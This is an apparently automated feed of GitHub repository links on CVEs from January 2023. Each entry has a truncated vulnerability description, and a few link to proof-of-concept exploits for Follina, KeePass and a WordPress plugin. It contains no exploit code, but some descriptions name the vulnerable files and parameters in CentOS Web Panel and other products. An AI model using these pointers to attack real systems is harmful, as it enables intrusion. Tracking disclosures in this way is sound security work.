**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21882](https://github.com/Live-Hack-CVE/CVE-2023-21882) create time: 2023-01-25T15:42:48Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: GIS). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerabilit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21887](https://github.com/Live-Hack-CVE/CVE-2023-21887) create time: 2023-01-25T15:42:44Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle VM VirtualBox. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21886](https://github.com/Live-Hack-CVE/CVE-2023-21886) create time: 2023-01-25T15:42:40Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21885](https://github.com/Live-Hack-CVE/CVE-2023-21885) create time: 2023-01-25T15:42:36Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21884](https://github.com/Live-Hack-CVE/CVE-2023-21884) create time: 2023-01-25T15:42:32Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21889](https://github.com/Live-Hack-CVE/CVE-2023-21889) create time: 2023-01-25T15:42:29Z

**Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component: WebUI). Supported versions that are affected are 18.8.0-18.8.15, 19.12.0-19.12.15, 20.12.0-20.12.10 and 21.12.0-21.12.8. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to com CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21888](https://github.com/Live-Hack-CVE/CVE-2023-21888) create time: 2023-01-25T15:42:24Z

**Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Visual Analyzer). Supported versions that are affected are 5.9.0.0.0 and 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Bus CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21892](https://github.com/Live-Hack-CVE/CVE-2023-21892) create time: 2023-01-25T15:42:20Z

**Vulnerability in the Oracle Communications Converged Application Server product of Oracle Communications (component: Core). Supported versions that are affected are 7.1.0 and 8.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via UDP to compromise Oracle Communications Converg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21890](https://github.com/Live-Hack-CVE/CVE-2023-21890) create time: 2023-01-25T15:42:17Z

**Vulnerability in the Oracle Data Provider for .NET component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TCPS to compromise Oracle Data Provider for .NET. Successful attacks require human i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21893](https://github.com/Live-Hack-CVE/CVE-2023-21893) create time: 2023-01-25T15:42:12Z

**Vulnerability in the Oracle Solaris product of Oracle Systems (component: NSSwitch). Supported versions that are affected are 10 and 11. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Oracle Solaris. Successful attacks require human interac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21900](https://github.com/Live-Hack-CVE/CVE-2023-21900) create time: 2023-01-25T15:42:08Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21899](https://github.com/Live-Hack-CVE/CVE-2023-21899) create time: 2023-01-25T15:42:03Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21898](https://github.com/Live-Hack-CVE/CVE-2023-21898) create time: 2023-01-25T15:41:59Z

**Vulnerability in the Oracle Global Lifecycle Management NextGen OUI Framework product of Oracle Fusion Middleware (component: NextGen Installer issues). Supported versions that are affected are Prior to 13.9.4.2.11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21894](https://github.com/Live-Hack-CVE/CVE-2023-21894) create time: 2023-01-25T15:41:56Z

**CVE-2018-8097 PoC** : [SilentVoid13/CVE-2018-8097](https://github.com/SilentVoid13/CVE-2018-8097) create time: 2023-01-19T13:31:12Z

**Follina (CVE-2022-30190) proof-of-concept** : [Lucaskrell/go_follina](https://github.com/Lucaskrell/go_follina) create time: 2022-06-27T16:14:34Z

**no description** : [seoqqq/cve2018](https://github.com/seoqqq/cve2018) create time: 2023-01-25T07:55:34Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4186](https://github.com/Live-Hack-CVE/CVE-2016-4186) create time: 2023-01-25T06:57:59Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4185](https://github.com/Live-Hack-CVE/CVE-2016-4185) create time: 2023-01-25T06:57:55Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4184](https://github.com/Live-Hack-CVE/CVE-2016-4184) create time: 2023-01-25T06:57:52Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4240](https://github.com/Live-Hack-CVE/CVE-2016-4240) create time: 2023-01-25T06:57:48Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4238](https://github.com/Live-Hack-CVE/CVE-2016-4238) create time: 2023-01-25T06:57:44Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4239](https://github.com/Live-Hack-CVE/CVE-2016-4239) create time: 2023-01-25T06:57:40Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4236](https://github.com/Live-Hack-CVE/CVE-2016-4236) create time: 2023-01-25T06:57:37Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4237](https://github.com/Live-Hack-CVE/CVE-2016-4237) create time: 2023-01-25T06:57:33Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4235](https://github.com/Live-Hack-CVE/CVE-2016-4235) create time: 2023-01-25T06:57:30Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4234](https://github.com/Live-Hack-CVE/CVE-2016-4234) create time: 2023-01-25T06:57:27Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4233](https://github.com/Live-Hack-CVE/CVE-2016-4233) create time: 2023-01-25T06:57:22Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4221](https://github.com/Live-Hack-CVE/CVE-2016-4221) create time: 2023-01-25T06:57:19Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4187](https://github.com/Live-Hack-CVE/CVE-2016-4187) create time: 2023-01-25T06:57:03Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4188](https://github.com/Live-Hack-CVE/CVE-2016-4188) create time: 2023-01-25T06:56:59Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4245](https://github.com/Live-Hack-CVE/CVE-2016-4245) create time: 2023-01-25T06:56:52Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4246](https://github.com/Live-Hack-CVE/CVE-2016-4246) create time: 2023-01-25T06:56:48Z

**Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-417 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4244](https://github.com/Live-Hack-CVE/CVE-2016-4244) create time: 2023-01-25T06:56:44Z

**An incorrect authorization vulnerability was identified in GitHub Enterprise Server, allowing for escalation of privileges in GraphQL API requests from GitHub Apps. This vulnerability allowed an app installed on an organization to gain access to and modify most organization-level resources that are not tied to a reposi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23739](https://github.com/Live-Hack-CVE/CVE-2022-23739) create time: 2023-01-25T06:57:14Z

**TOTOlink A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection Vulnerability in the httpd service. An attacker can obtain a stable root shell through a specially constructed payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47853](https://github.com/Live-Hack-CVE/CVE-2022-47853) create time: 2023-01-25T06:57:10Z

**An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.9 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. It was possible to read repository content by an unauthorised user if a project member used a crafted link. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2907](https://github.com/Live-Hack-CVE/CVE-2022-2907) create time: 2023-01-25T06:57:06Z

**Improper sanitization of branch names in GitLab Runner affecting all versions prior to 15.3.5, 15.4 prior to 15.4.4, and 15.5 prior to 15.5.2 allows a user who creates a branch with a specially crafted name and gets another user to trigger a pipeline to execute commands in the runner as that other user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2251](https://github.com/Live-Hack-CVE/CVE-2022-2251) create time: 2023-01-25T06:56:55Z

**CVE-2023-24055 PoC (KeePass 2.5x)** : [alt3kx/CVE-2023-24055_PoC](https://github.com/alt3kx/CVE-2023-24055_PoC) create time: 2023-01-25T03:21:42Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21867](https://github.com/Live-Hack-CVE/CVE-2023-21867) create time: 2023-01-24T22:05:20Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21865](https://github.com/Live-Hack-CVE/CVE-2023-21865) create time: 2023-01-24T22:05:16Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21868](https://github.com/Live-Hack-CVE/CVE-2023-21868) create time: 2023-01-24T22:05:12Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.28 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21866](https://github.com/Live-Hack-CVE/CVE-2023-21866) create time: 2023-01-24T22:05:08Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21863](https://github.com/Live-Hack-CVE/CVE-2023-21863) create time: 2023-01-24T22:05:04Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Thread Pooling). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21874](https://github.com/Live-Hack-CVE/CVE-2023-21874) create time: 2023-01-24T22:05:00Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21873](https://github.com/Live-Hack-CVE/CVE-2023-21873) create time: 2023-01-24T22:04:56Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21872](https://github.com/Live-Hack-CVE/CVE-2023-21872) create time: 2023-01-24T22:04:52Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21870](https://github.com/Live-Hack-CVE/CVE-2023-21870) create time: 2023-01-24T22:04:48Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21869](https://github.com/Live-Hack-CVE/CVE-2023-21869) create time: 2023-01-24T22:04:45Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21871](https://github.com/Live-Hack-CVE/CVE-2023-21871) create time: 2023-01-24T22:04:41Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21879](https://github.com/Live-Hack-CVE/CVE-2023-21879) create time: 2023-01-24T22:04:36Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21878](https://github.com/Live-Hack-CVE/CVE-2023-21878) create time: 2023-01-24T22:04:33Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21876](https://github.com/Live-Hack-CVE/CVE-2023-21876) create time: 2023-01-24T22:04:29Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21877](https://github.com/Live-Hack-CVE/CVE-2023-21877) create time: 2023-01-24T22:04:25Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.31 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21875](https://github.com/Live-Hack-CVE/CVE-2023-21875) create time: 2023-01-24T22:04:22Z

**no description** : [manas3c/CVE-2023-22960](https://github.com/manas3c/CVE-2023-22960) create time: 2023-01-24T20:23:09Z

**CentOS-WebPanel.com (aka CWP) CentOS Web Panel through 0.9.8.740 allows XSS via the admin/index.php module parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18774](https://github.com/Live-Hack-CVE/CVE-2018-18774) create time: 2023-01-24T19:50:58Z

**CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.480 has Command Injection via shell metacharacters in the admin/index.php service_start, service_restart, service_fullstatus, or service_stop parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18322](https://github.com/Live-Hack-CVE/CVE-2018-18322) create time: 2023-01-24T19:50:17Z

**CentOS-WebPanel.com (aka CWP) CentOS Web Panel through v0.9.8.12 has XSS via the `module` value of the `index.php` file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-5961](https://github.com/Live-Hack-CVE/CVE-2018-5961) create time: 2023-01-24T19:50:13Z

**CentOS-WebPanel.com (aka CWP) CentOS Web Panel through 0.9.8.740 allows CSRF via admin/index.php?module=send_ssh, as demonstrated by executing an arbitrary OS command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18772](https://github.com/Live-Hack-CVE/CVE-2018-18772) create time: 2023-01-24T19:50:09Z

**index.php in CentOS-WebPanel.com (aka CWP) CentOS Web Panel through v0.9.8.12 has XSS via the id parameter to the phpini_editor module or the email_address parameter to the mail_add-new module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-5962](https://github.com/Live-Hack-CVE/CVE-2018-5962) create time: 2023-01-24T19:50:02Z

**In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to access and delete DNS records of a victim's account via an attacker account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14726](https://github.com/Live-Hack-CVE/CVE-2019-14726) create time: 2023-01-24T19:51:01Z

**In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.851, an insecure object reference allows an attacker to delete a sub-domain from a victim's account via an attacker account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14729](https://github.com/Live-Hack-CVE/CVE-2019-14729) create time: 2023-01-24T19:50:50Z

**In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.836, a cwpsrv-xxx cookie allows a normal user to craft and upload a session file to the /tmp directory, and use it to become the root user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13359](https://github.com/Live-Hack-CVE/CVE-2019-13359) create time: 2023-01-24T19:50:35Z

**CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.864 allows an attacker to get a victim's session file name from /home/[USERNAME]/tmp/session/sess_xxxxxx, and the victim's token value from /usr/local/cwpsrv/logs/access_log, then use them to gain access to the victim's password (for the OS and phpMyAdmin) via an att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15235](https://github.com/Live-Hack-CVE/CVE-2019-15235) create time: 2023-01-24T19:50:21Z

**CentOS-WebPanel.com (aka CWP) CentOS Web Panel through 0.9.8.763 is vulnerable to Stored/Persistent XSS for the "Package Name" field via the add_package module parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7646](https://github.com/Live-Hack-CVE/CVE-2019-7646) create time: 2023-01-24T19:50:05Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_php_pecl.php. When parsing the canal parameter, the process does not properly validate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15434](https://github.com/Live-Hack-CVE/CVE-2020-15434) create time: 2023-01-24T19:51:05Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the package parameter, the process does not pro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15616](https://github.com/Live-Hack-CVE/CVE-2020-15616) create time: 2023-01-24T19:50:54Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_dashboard.php. When parsing the service_start parameter, the process does not properly CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15435](https://github.com/Live-Hack-CVE/CVE-2020-15435) create time: 2023-01-24T19:50:47Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_new_account.php. When parsing the domain parameter, the process does not proper CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15624](https://github.com/Live-Hack-CVE/CVE-2020-15624) create time: 2023-01-24T19:50:43Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_list_accounts.php. When parsing the id parameter, the process does not properly CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15620](https://github.com/Live-Hack-CVE/CVE-2020-15620) create time: 2023-01-24T19:50:40Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the archivo parameter, the process does not properly val CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15422](https://github.com/Live-Hack-CVE/CVE-2020-15422) create time: 2023-01-24T19:50:32Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_crons.php. When parsing the user parameter, the process does not properly validate a us CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15429](https://github.com/Live-Hack-CVE/CVE-2020-15429) create time: 2023-01-24T19:50:28Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_ftp_manager.php. When parsing the userLogin parameter, the process does not properly va CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15612](https://github.com/Live-Hack-CVE/CVE-2020-15612) create time: 2023-01-24T19:50:24Z

**The unprivileged user portal part of CentOS Web Panel is affected by a Command Injection vulnerability leading to root Remote Code Execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31324](https://github.com/Live-Hack-CVE/CVE-2021-31324) create time: 2023-01-24T19:49:58Z

**The unprivileged user portal part of CentOS Web Panel is affected by a SQL Injection via the 'idsession' HTTP POST parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31316](https://github.com/Live-Hack-CVE/CVE-2021-31316) create time: 2023-01-24T19:49:55Z

**An Access of Uninitialized Pointer vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a locally authenticated attacker with low privileges to cause a Denial of Service (DoS). When an MPLS ping is performed on BGP LSPs, the RPD might crash. Repeated execution of t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22398](https://github.com/Live-Hack-CVE/CVE-2023-22398) create time: 2023-01-24T19:49:48Z

**POC and Scanner for CVE-2023-24055** : [deetl/CVE-2023-24055](https://github.com/deetl/CVE-2023-24055) create time: 2023-01-24T19:19:23Z

**Unauthenticated SQL Injection - Paid Memberships Pro < 2.9.8 (WordPress Plugin)** : [r3nt0n/CVE-2023-23488-PoC](https://github.com/r3nt0n/CVE-2023-23488-PoC) create time: 2023-01-24T18:26:10Z

**Format string vulnerability in vmware-vmrc.exe build 158248 in VMware Remote Console (aka VMrc) allows remote attackers to execute arbitrary code via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-3732](https://github.com/Live-Hack-CVE/CVE-2009-3732) create time: 2023-01-24T17:40:25Z

